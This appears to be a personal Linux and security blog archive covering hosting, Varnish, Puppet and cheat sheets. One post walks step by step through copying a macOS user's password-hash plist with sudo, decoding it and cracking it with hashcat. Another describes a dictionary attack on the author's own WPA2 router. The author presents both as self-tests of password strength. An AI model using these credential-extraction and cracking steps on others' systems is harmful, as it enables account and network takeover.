I think I have made the best possible choice when I decided to go to Haaga-Helia. I have not been anywhere else but I have no bad things to tell about Haaga-Helia so I cannot imagine what could be better in other Universities. If I had to choose again I would still go to Haaga-Helia. I love the atmosphere and the way how teacher organize their courses. In fact I`ve heard from teachers that they like to be there as well. If everything goes well on courses they have power to do what they feel is the best.

If you like to get some more information please head to: http://www.haaga-helia.fi/fi/hakijalle

This post is made in cooperation with Haaga-Helia University of Applied Sciences.

HTML5 cheat sheet

March 3, 2015

Just a simple HTML5 document

Sometimes it is very frustrating when you are starting a new project and you can not remember how to include javascripts or how to do a comment in HTML5. Of course you can find the way but if it takes more than one minute it is kinda annoying when you just want to do something quick.

Live demo!

 

[html]<!doctype html>
<html lang="en">
<head>
    <title>HTML5 document</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="This is about to tell something important">
    <meta name="keywords" content="keyword1, keyword2, keyword3">
    <meta name="author" content="Tuukka Merilainen">

    <!--An example of a comment-->
    <link rel="stylesheet" href="style.css">
    <script src="jquery-1.11.2.min.js"></script>

</head>
    <body>
        <main>
          <article>
            <header>
              <h1>This is HTML5 document </h1>
              <p>
                  UTF-8 encoded and written in english.
              </p>
              <img alt="HTML5 logo" src="html5-logo.png">
            </header>
          </article>
        </main>
    </body>
</html>[/html]

Write a valid code and make an easy usability

Remember to scan your documents with these two validators (first for markup second for accessibility):

http://validator.w3.org/
http://achecker.ca/checker/index.php

Sources:

https://github.com/bendc/frontend-guidelines

How to crack macbook admin password

January 20, 2015

pirate tux penguinIntroduction

I have been worried about security for a long time. When you read regular articles about security you will almost always face paragraph which tells you that it is very important to have a good password. Last time I tested how easy/hard it is to crack my wap2 secured wlan with weak password. I am now going to crack my macbook pro which is running OSx Mavericks.

Starting point

I have actually learned something in past few months and I have very strong password at the moment. For this test I changed it to something which I feel is closer to password users normally have. I  changed the password to: Laisk489 . It is a Finnish word meaning lazy with little bit of leetspeak and it will pass Apples password policy.

Like in router article I did not have any previous experience about cracking OSx password. So google was my friend again. Not so many searches later I found this very decent article about “How to Extract OS X Mavericks Password Hash for Cracking With Hashcat”. It is step by step guide of what I was looking for, perfect!

There is methods to obtain password hash(which is the password protected with mathematical algorithm) when you are unable to log into any account on the machine. I am not so interested about that since I just like to test how weak my own password is. So I skipped that part. After reading the article I knew that password hash in Mavericks is located in this path: /var/db/dslocal/nodes/Default/users/<user>.plist .

Getting the hash

I opened terminal on my mac and tried to acces to /var/db/dslocal/nodes/Default/users.

$ cd /var/db/dslocal/nodes/Default/users
-bash: cd: /var/db/dslocal/nodes/Default/users: Permission denied
$ ls /var/db/dslocal/nodes/Default/users
ls: /var/db/dslocal/nodes/Default/users: Permission denied

It did not worked cause I did not have permissions to that folder. I had to sudo.

$ sudo ls /var/db/dslocal/nodes/Default/users
There it was: tuukka.plist
I copied it to my desktop:
$ sudo cp /var/db/dslocal/nodes/Default/users/tuukka.plist Desktop/tuukka.plist

 Extract the hash for hashcat

Now this part goes little bit tricky and I spent couple of hours thinking what is actually happening. After all this is actually very simple task. The hash is in binary format by default and we want to convert it in to XML.

On macs terminal I switch path to Desktop, then create a folder for our mission and moved the hash into that folder:

$ cd
$ cd Desktop/
$ mkdir password-crack
$ mv tuukka.plist password-crack/
$ cd password-crack/

To convert the hash I used following:

$ sudo plutil -convert xml1 tuukka.plist

After that I opened the hash with

$ sudo nano tuukka.plist

And there was lots of stuff in it. Line I was looking were under “ShadowHashData” surrounded by <data></data> tags. I copied that data to a clipboard with cmd+c and pasted it to sublime texteditor. I removed returns and put everyhting on the same line. Just hitted return like hundred times and took care that any letters were not deleted.

password-crack-sublime

After return maraton I copy pasted it to terminal and entered some commands and did this:

$ sudo echo “YnBsaXN0MDDRAQJfEBRTQUxURUQtU0hBNTEyLVBCS0RGMtMDB
AUGBwhXZW50cm9weVRzYWx0Wml0ZXJhdGlvbnNPEIBWEto5iOf1chpuN/HDsV3iP3s
IjhFoXbrG2/5fPhBRgz9v8CDd/PlyONacUDcQrWFSAvEew1gKMwEP9haGH8sFA1jT9
kmFyFh0kpk+8dN1FdAZJxiP3K3QbRj+owIWZxMTYoMmkRh5ZrnxVqDb5zvGA5443
O1yV4DovhT6SuLrL08QIDOAL/Y5nd9PcXEBDAzO+N+6fNc5wvxGslginwn9iLDJEYi
VCAsiKTE2QcTnAAAAAAAAAQEAAAAAAAAACQAAAAAAAAAAAA
AAAAAAAOo=” | base64 -D > shadowhash
$ sudo file shadowhash
$ sudo plutil -convert xml1 shadowhash

Hash were now converted. I opened shadowhash with nano editor and there was data separated under tags entropy, iterations and salt. As said in the guide entropy and salt were still in base64 format and needed to convert again.

entropy-salt

Like before I first copied entropy data to clipboard and then pasted it to sublime-text. On sublime I removed returns and put data on same line. After that I did following:

$ sudo echo “VhLaOYjn9XIabjfxw7Fd4j97CI4RaF26xtv+Xz4QUYM/b/Ag3fz5cjjWnFA3EK1hUgLxHsNYCjMBD/YWhh/LBQNY0/ZJhchYdJKZPvHTdRXQGScYj9yt0G0Y/qMCFmcTE2KDJpEYeWa58Vag2+c7xgOeONztcleA6L4U+kri6y8=” | base64 -D > entropy
$ sudo file entropy
$ sudo xxd entropy

There it was entropy data converted to hex values. Once more I had to copy and paste values from terminal to sublime-text and remove spaces. This time there were some data to be deleted. Hex values are the ones on to middle as highlighted in this screenshot:

hex-values

Hex data required some fine-tuning. I copied the whole thing to clipboard and pasted it to sublime-text. Then removed “useles” part and spaces and it looked like this:

entropy-hex

I repeated same process to the salt hash.

$ sudo echo “M4Av9jmd309xcQEMDM7437p81znC/EayWCKfCf2IsMk=” | base64 -D > salt
$ sudo file salt
$ sudo xxd salt

And then the copy-paste-removespaces operation blaa blaa…

Annoying part was almost over. Last thing to do was combine all those hex values for hashcat which I used for actual cracking. Hashcat requires data in this kind of format:
$ml$<iterations>$<salt>$<entropy>

Here is what I did in one screenshot (click for bigger size):

finally-ready-for-hashcat
Please notice that everything is on the same line, there is just wordwrap turned on in sublime-text!

Crack with hashcat

For cracking I am using my mid 2012 13″ macbook pro with 2,9GHz i7.

Alright everything was prepared and ready for hashcat. At this point the guide went littlebit tricky and led to dictionary attack. It was obviously something that does not fitted my needs and I started to googling. Actually I am very happy that original guide was littlebit tricky and led me to google. I found this particularly fine blog about all kind of goodnes: http://www.unix-ninja.com/. And there was also very nice guide about hashcat.

I tought that bruteforce is something I would like to use, but unix-ninja teached me something new: brute force with masks. Basicly the mask is pattern for cracking software (hashcat in this case) which contains some facts we already know about password. For example if you know that password starts with uppercase letter, last three digits are numbers and is 8 characters long you can actually tell it to hashcat. With those kind of infos hashcat is able to crack the hash way more faster than without any foreknowledge.

Now let me take a self… No not that. I needed the hashcat and I downloaded it from here: http://hashcat.net/hashcat/ It went to my downloads folder which I opened in Finder. File was compressed and I extracted it by clicking on it(with The Unarchiver).

After that I opened new terminal and went to folder I just extracted and putted the hash in it:
$ cd
$ cd Downloads/hashcat-0.49
$ nano laiska.hash
Copy pasted the hash I made earlier and saved.

Everything was ready for the cracking. I got hashcat and I got hash prepared for it and I got mask. No I did not had a mask. As I said earlier my password is Laisk489. Starting with uppercase letter, last three characters are numbers and total of 8 characters long. I needed mask for that. I found almost right pattern for me from unix ninja. I made a small changes and here is the result:

?u?l?l?l?l?d?d?d

It contains this information about password: Starting with uppercase letter, last three characters are numbers and total of 8 characters long.

I started cracking with this command:

$ ./hashcat-cli64.app -m 7100 -a3 laiska.hash ?u?l?l?l?l?d?d?d
-m 7100 is mode for cracking OSx v10.8/v10.9 passwords
-a3 stands for brute-force
laiska.hash contains my hash
and last part is the mask
More info from hashcat manual.

hashcat-cracking

Many hours later I decide to stop craking. It was just taking too long, At the stage five estimated time was over 3days as you can see:

cracking-takes-too-long

Did the hash work/contained right info

I wanted to make sure that my hash was working. I made wordlist.txt file into hashcat directory and put there couple of words including my password Laisk489. I ran hahscats dictionary attack and it did break the hash and found that password was Laisk489.

$ ./hashcat-cli64.app -m 7100 laiska.hash wordlist.txt

After the execution were completed I found results in the file hashcat.pot. There was my password Laisk489.

Conclusion

Well it seems like my skills were littlebit inadequate. It was still very interesting and educational project. I might continue from this point later with new strategy and try to use modified version of wordlist which I used in router guide. I was suprised that it takes that long to break password with mask even it is not more than 8 characters. Of cource the method was still brute-force and my hardware is not that good and yes I was just using one laptop. Hard jacks might have bigger weapons. :p Which means that I am still going to use much more complex passwords than Laisk489 in the future.

If the time is not a problem or password is for example just only 4 or 5 characters it might be good shot to use these methods.

Sources

https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
http://www.unix-ninja.com/p/Exploiting_masks_in_Hashcat_for_fun_and_profit/
http://hashcat.net/wiki/doku.php?id=oclhashcat

 

Puppet module which secures your Ubuntu/Debian

January 8, 2015

bridge2 at tuukkamerilainen.com

For those who just want this module head to: https://github.com/RakField/puppet-secure-like-linode

Introduction

For the past year I have done Linodes securing your server guide configurations for so many times. Finally I decide to make puppet module to automate the process.

Alright you might have heard about Puppet already, if not you propably should. I have been playing with it for couple months and I love it already. It is so what I have been looking for. It just makes life easier. Once you have configured something once, you can do it again in minutes! :]

Puppet is open source configuration management software. Basicly you write script with puppet language which includes your needs. For example you would like to install apache with php5 and some virtual hosts. You just write script and puppet will do the installation. It can be setupped master node way where one machine acts as the puppetmaster and others are clients which are asking catalogs from master.

 

Module details

So I wanted to make module to automate steps from this guide: https://www.linode.com/docs/security/securing-your-server

  1. Add user for administration
  2. Use SSH key pair authentication
  3. Disable SSH Password Authentication and Root Login
  4. Create a firewall
  5. Install fail2ban

This module is tested on Ubuntu 14.04 LTS and Debian 7.6.

 

Structure

|-- secure
|   |-- files
|   |   |-- authorized_keys
|   |   |-- iptables.firewall.rules
|   |   `-- sshd_config
|   |-- lib
|   |   `-- puppet
|   |       `-- parser
|   |           `-- functions
|   |               `-- pw_hash.rb
|   `-- manifests
|       |-- fail2ban.pp
|       |-- firewall.pp
|       |-- init.pp
|       `-- ssh.pp

Operating principle

All configurations are made by placing configurations files to specific places. For example the modelu first installs openssh server and then replaces original sshd_config file with modified version. If you would like to make changes to openssh server configuration or firewall you should modify files at secure/files.

 

Usage

Works almost from the box. First thing to do is change authorized_keys files content with your own rsa key. To use module it is required to define user and system variables. This can be done in site.pp:

Example:
adminuser {’username’: usr_pw => ’userpassword’, }
Exec { path => [ “/bin/”, “/sbin/” , “/usr/bin/”, “/usr/sbin/” ] }

 

Investigate and download the module

https://github.com/RakField/puppet-secure-like-linode

 

Sources

pschyska. PW hashing with puppet parser function. URL: https://gist.github.com/pschyska/26002d5f8ee0da2a9ea0
Linode. Securing Your Server. URL: https://www.linode.com/docs/security/securing-your-server

Linux cheat sheet

December 21, 2014

Introduction

Some things are just hard to remember. Nasty moment comes when you have to do something but you just do not remember the right order. These are my weak points. All tested on Ubuntu 14.04 LTS.

 

Miscellaneous

tar: create – full backup of /, dont tar /mnt

$ sudo tar -cvpzf backup.tar.gz –exclude=/mnt /

tar: extract – backup extracted to /recover folder

$ sudo tar -xvpz backup.tar.gz -C /recover

 

Edit crontabs

$ crontab -e

 

rsync
todo

 

grep: find out how to enable php scripts in user directories with apache

$ sudo grep -r ‘user directories’ /etc/apache2/*

Iptables stuff

iptables accept or drop all

$ sudo iptables -P INPUT ACCEPT // DROP

iptables list rules fast

$ sudo iptables -L -n

iptables format rules

$ sudo iptables -F

iptables accept by port

$ sudo iptables -I INPUT -s 0.0.0.0/0 -p tcp –dport 80 -j ACCEPT

iptables accept by ip

$ sudo iptables -I INPUT -s 172.28.0.0/255.255.0.0 -j ACCEPT

Iptables stateful firewall

$ sudo iptables -I INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT

 

show system variables

$ $PATH

 

Give sudo

$ usermod -a -G sudo exampleuser

 

ssh-keypair on serverside

$ ssh-keygen //follow steps
$ mv id_rsa.pub .ssh/authorized_keys
$ chown -R example_user:example_user .ssh
$ chmod 700 .ssh chmod 600 .ssh/authorized_keys

 

Puppet test gatalog on node do not operate

$ sudo puppet agent – -test – -noop

 

perl: warning: Please check that your locale settings FIX

$ export LC_ALL="en_US.UTF-8"

Send email from shell

$ echo ‘message’ | mail -s “subject” -a “From: yourname@example.com” -A example-attachment receiveremail@example.com

mysql (create database, user and grant privileges)

CREATE DATABASE dbname;

USE dbname;

GRANT ALL ON dbname.* TO ‘dbuser’@’localhost’ IDENTIFIED BY ‘password’;

FLUSH PRIVILEGES;

 

References

Eli The Computer Guy tar backup

Linode Securing Your Server

 

Self made theme, finally

October 6, 2014

new-theme-both

 
Its over 6 montsh since I started to write this blog. First posts were written into the wordpress.com. Quite soon I wanted to host my blog by myself and tuukkamerilainen.com was born.

I was so into Linux and VPS world that I did not want to waste time on making theme. I picked BizzCard Theme by ThemeZee. Actually it fitted my needs quite well and within months I started to like it more and more.

Since I like to learn and make everything by myself (especially if its not related to Microsoft) I have dreamed about Self made theme. Couple of days ago I got great vision of what kind of theme I would like to have and here is the result. There is still lots of things to fix and build, but let this be the version 1.0.

How I host tuukkamerilainen.com with VPS

September 29, 2014

14929298997_ac65103bcc_k

If you would like to know how stuff works, learn something new and have a full control. VPS is the absolute solution for you.

Contents of this post:
Introduction
How this site is hosted
What else I am hosting
Is it like expensive
Conclusion
References

Introduction

Lets talk some basics first. Virtual private server eg. VPS is virtualized server in physical server. You lease virtualized server and cost is related on how much resources is needed. For example my VPS (which is hosting this website) have 2GB of ram, 2 CPU cores and 48GB of disk space. My server costs 20$ per month.

According to Chris Wiegman hosting has went through huge evolution. Wiegman reports that “in the mid-90s about the only services available to the masses to host a website fell along the lines of GeoCities”. Comparing that to present I can`t see any similarities. Wiegman mention that there are 4 main types of hosting: shared hosting, vps hosting, dedicated hosting and cloud hosting. All of those 4 have own strenghts and weaknesses.

My passion to Linux has led me to this point where I want to build everything by myself rather than buying reconfigured solutions. So my decision for hosting is VPS. I am going to explain how I make use of it. What kind of server I have and what daemons are required.

How this site is hosted

I have VPS hosted by Linode. On that server I am running Ubuntu 14.04 LTS linux distribution. Then I have made some security configurations, installed apache, mysql & php and wordpress. Finally I have made some dns related configurations.

  1. Leased VPS from linode.com
  2. Choosed Ubuntu as an operating system
  3. Some security configurations made to Ubuntu (there is nice guide to this on linodes docs)
  4. Apache, mysql and php installed (awesome guide nowhere else than in linodes docs)
  5. WordPress installed (my own guide to wordpress install)
  6. DNS settings made with Linodes DNS manager for tuukkamerilainen.com domain (my own guide to .tk domain and Linodes DNS manager)
  7. Virtual host configurations made to apache for tuukkamerilainen.com domain (my own guide to virtual hosts)

What else I am hosting

There is lots of other cool stuffs you can host and use.  With just lamp stack you can run useful services like tinytinyrss and owncloud. At the moment I am also running mail server which means that mails sent to contact@tuukkamerilainen.com are actually handled by my own server. That is really cool stuff. It took some time to make mail server happen, but it was worth it.

  • Mail server (surprise surprise there is brilliant stuff on linodes docs)
  • TinyTinyRss reader (nice way to read news everyday)
  • Owncloud (similar to dropbox)
  • Backup solutions for personal use
  • rakfield.com (my disc jockey site)

Is it like expensive?

It is not.  I am paying 20$ per month of my VPS and 20$ per year of my domain. Actually I am paying littlebit of too much since Linodes cheapest solution costs 10$ and it would fill my needs. I might downgrade on future.

Conclusion

Lets say that you would like to have web site or couple of them. Just have them online and manage content. You are not interested about technical aspects or tweaking the performance. Maybe you feel like you are more valuable on building awesome content to your blog rather than when you are hacking with linux. If all this sounds like you: go for web hosting/shared hosting.When discussing different hosting methods Wiegman states:

In the end the type of hosting you pick depends on both your experience level and the number of visitors you plan on seeing at your site. The higher either one of those variables gets the more it will cost you. (Wiegman, C. 7.11.2011)

If you would like to know how stuffs work and learn something new or you just have very popular sites. VPS is absolutely the solutions for you. You might feel that 10$ per month is too much to spend on VPS since you might get nice web hosting package with just 5$ per month. In my opinion VPS gives you so many opportunities compared to web hosting that those 10$ are worth it.

Referenres:

Chris Wiegman 7 Oct 2011.Shared Hosting vs VPS vs Cloud vs Dedicated Server. http://www.chriswiegman.com/2011/10/shared-hosting-vs-vps-vs-cloud-vs-dedicated-server/ Accessed 2.10.2014
https://www.linode.com/docs/security/securing-your-server/

https://www.linode.com/docs/websites/hosting-a-website/
https://www.linode.com/docs/email/postfix/email-with-postfix-dovecot-and-mysql

How I hacked router in 43seconds

April 7, 2014

penguin-161356_640

The usual Sunday morning and read the Hacker News. I Found the title “How I hacked router”. Author hacked his friend for request and did it by hacking his router. After reading I was loaded with curiosity. I wanted to try something similar and I started to think what is my weak spot. Not so many thoughts later I realised that a most important thing which I have is a backups of my music library which are saved to Time capsule. Oh yes, Time capsule is a router and I am going to hack it.

Starting point

Time capsule is located in a safe place at my home. Something not so safe is a wlan-password which was finnish word: kultakala (goldfish in english). Secured with wpa2. The most critical thing was that a root-password to router was exactly the same as the wlan-password. So if I could crack wlan-password I could easily delete all backups in Time capsule. SICK!

Hacking Time capsule with reaver

I had no previous experience at all of password cracking or “hacking-hacking”. So I started by googling “How to crack wpa2”. It led me to lifehacker.coms step by step article from Adam Pash of How to crack wpa2 with reaver.  Mr. Pash used Backtrack linux distro for cracking. In this point I remembered that Somehow I know that Backtrack is the ultimate hacking distro and new version of it is Kali linux.

I googled “crack wpa2 kali reaver”. I found this Secretlaboratory.orgs guide. First I downloaded kali linux from official web site. I went on Kali Linux 1.0.6 64 Bit and burned it to dvd. Since I was going to crack wlan I had to have Kali in machine which has wireless network adapter. I decide to use my macbook pro and turned out that holding alt-key on boot (dvd inside) – easily led me to boot live version of Kali.

I followed the Secretlaboratory.orgs step-by-step guide. At firs it actually went quite well but it failed very soon. I realised that the reaver is designed to crack acces points with wps. Basically it is a authorization system where you have a magic-button in access point. Pushing the button lets you to connect to acces point. Time capsule acces point does not have this ability which is actually very nice since it makes it little bit better secured. I had to figure out the new way of crack it.

Dictionarry attack against Time capsule

After 20minutes of googling I was again much more wiser. Turned out, if you can not exploit WPS – the only options are to brute force and dictionary-based attack. I decide to give dictionarry-attack a try and found this Drchaos.coms step-by-step guide of of cracking wpa2 with kali using dictionarry-attack.

Guide was very easy to follow. Last step of it when you have captured a password-hash and you are going to crack it you have to have dictionary-file. Basically it is file which contains words from dictionary.

At this point I started to thinking “Where the hell I could find finnish dictionary in one file – well, I could not find it!”. I still googled “finnish dictionarry attack” and BOOM second link let me to site which let me to site which is hosting file called word.finnish containing 287698 finnish words. I used that file and here is the result:

43seconds

I cracked my Time capsules password in 43 seconds. SICK!

Worst of all, after that I could delete all my backups easily since I used same root-password and wlan-password.

 

Sources:

http://disconnected.io/2014/03/18/how-i-hacked-your-router/

http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver/all

Crack WPA/WPA2 Wireless Password Using Reaver in Kali Linux!

http://www.drchaos.com/breaking-wpa2-psk-with-kali/

ftp://ftp.funet.fi/pub/unix/security/dictionaries/Finnish/

Threat news

April 1, 2014

434298567_cf0bd9dc55_o

This post is part of Petri Hirvonen`s course: Security.

Mission

Explore news regarding to security. Find one headline to each category listed below (not older than six months).

  1. Scams, social hacking
  2. Physical attacks
  3. Network, the use of threats (phishing)
  4. Denial-of-service attack

Social hacking

http://edition.cnn.com/2014/01/01/tech/social-media/snapchat-hack/

Hackers were able to catch millions of snapchat accounts. The anonymous hackers said: “We used an exploit created by recent changes to the app, which lets users share photos or short videos that disappear after a few seconds.”

Physical attacks

http://spectrum.ieee.org/energywise/energy/the-smarter-grid/attack-on-california-substation-fuels-grid-security-debate

Atleast one person entered to Metcalfs substation and cut fiber cables. After that one or more gunmen opened fire on the substation for nearly 20 minutes. During that someone stole 17 transformers and then slipped away before police showed up.

Network, the use of threaths (phishing)

http://www.cnet.com/how-to/spot-a-phishing-e-mail-in-2014/

Writer got an email related to his Apple-ID. Sender is telling that there has been made changes to your accounts Credit Card information and asks for confirmation. Turns out that message is not from Apple. Just another hacker trying to get your personal information.

Denial -of-service attack

http://www.cnet.com/news/ddos-attack-is-launched-from-162000-wordpress-sites/

Hackers were able to conquer more than 162000 WordPress powered sites and use them to denial of service attack against another Web site.

 

 

Linux as server #7 – Apache benchmark, performance boost with Varnish (proxy) and yslow analysis

March 17, 2014

niagara-218591_1280

This post is part of Tero Karvinen’s course: Linux as server. Even it is related to school mission it will offer usefull information about GNU/Linux!

Before final test of the course Mr. Karvinen introduced solutions to improve server performance with proxy. My last mission was:

  • Do apache`s pressure test with static and dynamic WordPress pages
  • Install Varnish, do pressure test again and examine the results
  • Make .iso images pass varnish
  • Analyse pages with yslow (firefox addon)

All tests made with Xubuntu 12.04 LTS Precise Pangolin 32bit.

Hardware:

  • Motherboard: Asus Z87-C
  • CPU: Intel Core i5-4670K 3.40GHz
  • RAM: 8GB DDR3 1600MHz
  • HDD: 120GB SSD Sata 3.0
  • GPU: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asus cd/dvd

Preparing for benchmark test

First I needed two sites static and dynamic ones. I already had wordpress installed so I decided to use that as dynamic site. I went to index-page of WordPress with Firefox, right-clicked on site and then pressed “View Page Source”. I had source of singe wordpress-page which I could use as static page. I copied the source to clipboard and went to terminal.

$ cd
$ cd public_html/
$ mkdir static
$ cd static/
$ nano index.html
CTRL+v->CTRL+x->y->ENTER

Then I tested if the pages look similar

$ firefox http://localhost/~tuukka/wordpress/
$ firefox http://localhost/~tuukka/static

Both pages looked exactly the same. What makes them different to each other is that page on http://localhost/~tuukka/wordpress/ is build from mysql database with php, html and css. Static page just contains pure html and css.

Benchmark before varnish

I used apache`s own benchmark tool ab in these forms:

$ ab -c 150 -n 1000 http://localhost/~tuukka/wordpress
$ ab -c 150 -n 1000 http://localhost/~tuukka/static

Here are results in same image:

combination-novarnish

At this point I realised there might be something I am doing wrong since results are so close to each other. I made fresh install of wordress and made new post. I also made static version of that post page. Here is the new page:

benchmark

I made same tests again with new pages.

$ ab -c 150 -n 1000 http://localhost/~tuukka/wordpress/?p=4
$ ab -c 150 -n 1000 http://localhost/~tuukka/static/index.html

combined1

I got totally different kind of results with new setup. 1000 page loads 150 at the same time took 24.157seconds with dynamic page and 0.049 with static page.

Varnish installation

I installed package.

$ sudo apt-get update
$ sudo apt-get install varnish

Then I made apache to listen on port 8080 instead default 80. I edited ports.conf lines NameVirtualHost and Listen.
$ sudoedit /etc/apache2/ports.conf

# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default
# This is also true if you have upgraded from before 2.2.9-3 (i.e. from
# Debian etch). See /usr/share/doc/apache2.2-common/NEWS.Debian.gz and
# README.Debian.gz

NameVirtualHost *:8080
Listen 8080

<IfModule mod_ssl.c>
    # If you add NameVirtualHost *:443 here, you will also have to change
    # the VirtualHost statement in /etc/apache2/sites-available/default-ssl
    # to <VirtualHost *:443>
    # Server Name Indication for SSL named virtual hosts is currently not
    # supported by MSIE on Windows XP.
    Listen 443
</IfModule>

I also made changes to /etc/apache2/sites-enabled/000-default as the third line in ports.conf said.

$ sudoedit /etc/apache2/sites-enabled/000-default
Changed: VirtualHost *:80 -> VirtualHost *:8080

ServerName tuukka-xubuntu
<VirtualHost *:8080>
        ServerAdmin webmaster@localhost

        DocumentRoot /var/www
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>

Tested if it was working by restarting apache and trying to load page.

$ sudo service apache2 restart
$ firefox localhost
Led me to “Unable to connect page
$ firefox localhost:8080
Worked perfectly!

Then the varnish setup. I made changes to /etc/default/varnish.

$ sudoedit /etc/default/varnish
There was different setups ready to use. By default it was using “Alternative 2” configuration which allows VCL. I decided to use it aswell and changed the port of line starting with: DAEMON_OPTS

...
## Alternative 2, Configuration with VCL
#
# Listen on port 6081, administration on localhost:6082, and forward to
# one content server selected by the vcl file, based on the request.  Use a 1$
# fixed-size cache file.
#
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"
...

Then I restarted varnish and tried if it was working.

$ sudo service varnish restart
$ firefox localhost
This led me to apaches default “It works” page and I noticed that varnish is working since apache is not listening default port.

Benchmark with varnish

Varnish is now configured and working. I made same tests again.

$ ab -c 150 -n 1000 http://localhost/~tuukka/wordpress/?p=4
$ ab -c 150 -n 1000 http://localhost/~tuukka/static/index.html

With dynamic page the improvement was clear. I noticed that with static page it was not so clear and it was actually slower to load than dynamic page. I do not know the reason. I tried test couple of times and all results were almost same. Here are example results:

combined2

Summary of the benchmark

Dynamic page
Without varnish:Time taken for tests: 24.157 seconds
Longest request: 9931 ms

With varnish:
Time taken for tests: 2.525 seconds
Longest request: 2489 ms

Static page
Without varnish:
Time taken for tests: 0.049 seconds
Longest request: 13 ms

With varnish:Time taken for tests: 3.944 seconds
Longest request: 3927 ms

With these results I would say Varnish is must if there is huge amount of traffic with dynamic pages.

How to make .iso images pass Varnish

First I tried what happens if I am trying to download .iso image through Varnish. I downloaded xubuntu-13.10 .iso and putted it under the public_html. I tried to download it and I got this funny guru meditation page. I am not quite sure what is exact reason for it. I guess it might be something related to memory of Varnish.

$ firefox localhost/~tuukka/xubuntu-13.10-desktop-i386.iso

gurumeditation

I googled a bit and found this Jukka Pentti`s blog. He was tried to make this work by editing /etc/varnish/default.vcl put did not tested it.

$ sudoedit /etc/varnish/default.vcl
I added this:

if (req.url ~“\.iso$”) {
 set req.backend = web;
 pass;
 }

 

$ sudo service varnish restart
At this point I got this message:

 * Stopping HTTP accelerator varnishd                                  [ OK ] 
 * Starting HTTP accelerator varnishd                                  [fail] 
Message from VCC-compiler:
Syntax error at
('input' Line 12 Pos 14)
if (req.url ~“\.iso$”) {
-------------#--------------

Running VCC-compiler failed, exit 1

VCL compilation failed

 

Obviously there is something wrong with the script I just added to default.vcl. I tried some debugging with this but it did not solved. I decided to google again and I found mikkott`s blog where he solved problem by passing all over 200mb files from varnish.

$ sudoedit /etc/varnish/default.vcl
Added this under backend default script:

sub vcl_recv {
 if (req.http.x-pipe && req.restarts > 0) {
  remove req.http.x-pipe;
  return (pipe);
 }
}

sub vcl_fetch {
 if (beresp.http.Content-Length ~ "[0-9]{8,}" ) {
  set req.http.x-pipe = "1";
  return (restart);
 }
}

 

Then I restarted Varnish and tried to download .iso again.

$ sudo service varnish restart

$ firefox localhost/~tuukka/xubuntu-13.10-desktop-i386.iso
After that guru did not meditated again and I was able to download .iso!

download

Page analysis with yslow

Yslow is plugin for firefox. I installed it from firefoxes add-ons manager. It was not working out of the box. Turned out that it might need firebug plugin to work. I installed firebug and reboot firefox. Made inspection with firebug(right clicked somewhere in any page) and after that yslow was also working.

I decided to analyse two different well known finnish sites mtv3.fi and yle.fi. Here are the results in one image:

combined_yslow

Overal scores:

yle.fi
Grade: DOverall performance score 69

mtv3.fi
Grade: D
Overall performance score 60

http://localhost/~tuukka/wordpress/ (this is the page used in varnish test)
Grade: A
Overall performance score 94

Based on these results seems like mtv3.fi is little bit faster to load. Yslow gave lots of information of these two sites. If I would like to make yle.fi load faster I would start from these yslow`s high priority suggestions:

This page has 13 external Javascript scripts. Try combining them into one.
This page has 4 external stylesheets. Try combining them into one.
This page has 25 external background images. Try combining them with CSS sprites.

 

Sources

http://terokarvinen.com/2013/aikataulu-–-linux-palvelimena-ict4tn003-11-ja-12-kevaalla-2014
Varnishin ja Nginx asennus Ubuntu serveriin
http://jukkapentti.wordpress.com/tag/varnish/

Free .tk domain, does It work?

March 9, 2014

This post is part of Tero Karvinen’s course: Linux as server. Even it is related to school mission it will offer usefull information about GNU/Linux!

My friend is kinda exact when it comes to money (something for me to learn). He was doing blogging in my server and used ip for accessing to his blog. I think it was very bad idea and I started to sort out is there cheap solution. Then I heard about dot.tk. They promise free domain and I could not believe it.  Well I tried and seems like there is such thing as free . Here is how I did it.

First I went to http://dot.tk

Then entered the domain and clicked go. After that I needed to fill some specific information depended on my VPS provider Linode.

aa

a

Thats pretty much it. I would say less is more what they are thinking at dot.tk. Then I added domain zone at my linode manager.

c

d

Dns configuration were done. I tried does it work.

$ firefox http://markushenri.tk

It led to the right place (my server). So it was working. I wanted to point it to my friends blog so I did virtualhost configurations.

$ sudoedit /etc/apache2/sites-available/markushenri.tk.conf

Added this:

# domain: markushenri.tk
# public: /home/example/public_html

<VirtualHost *:8080>
  # Admin email, Server Name (domain name), and any aliases
  ServerAdmin henri@markushenri.tk
  ServerName  www.markushenri.tk
  ServerAlias markushenri.tk

  # Index file and Document Root (where the public files are located)
  DirectoryIndex index.html index.php
  DocumentRoot /home/example/public_html/

  # Log file locations
  LogLevel warn
  ErrorLog  /home/example/public_html/log/error.log
  CustomLog /home/example/public_html/log/access.log combined
</VirtualHost>
Please not that if you like to make it work, you need to do log folder into public_html. I had done it before. More information here.

Then ctrl+x -> y -> ENTER
$ sudo a2ensite markushenri.tk.conf
$ sudo service apache2 restart

Then I tested if it is working.

$ firefox http://www.markushenri.tk

BOOM it was pumping!

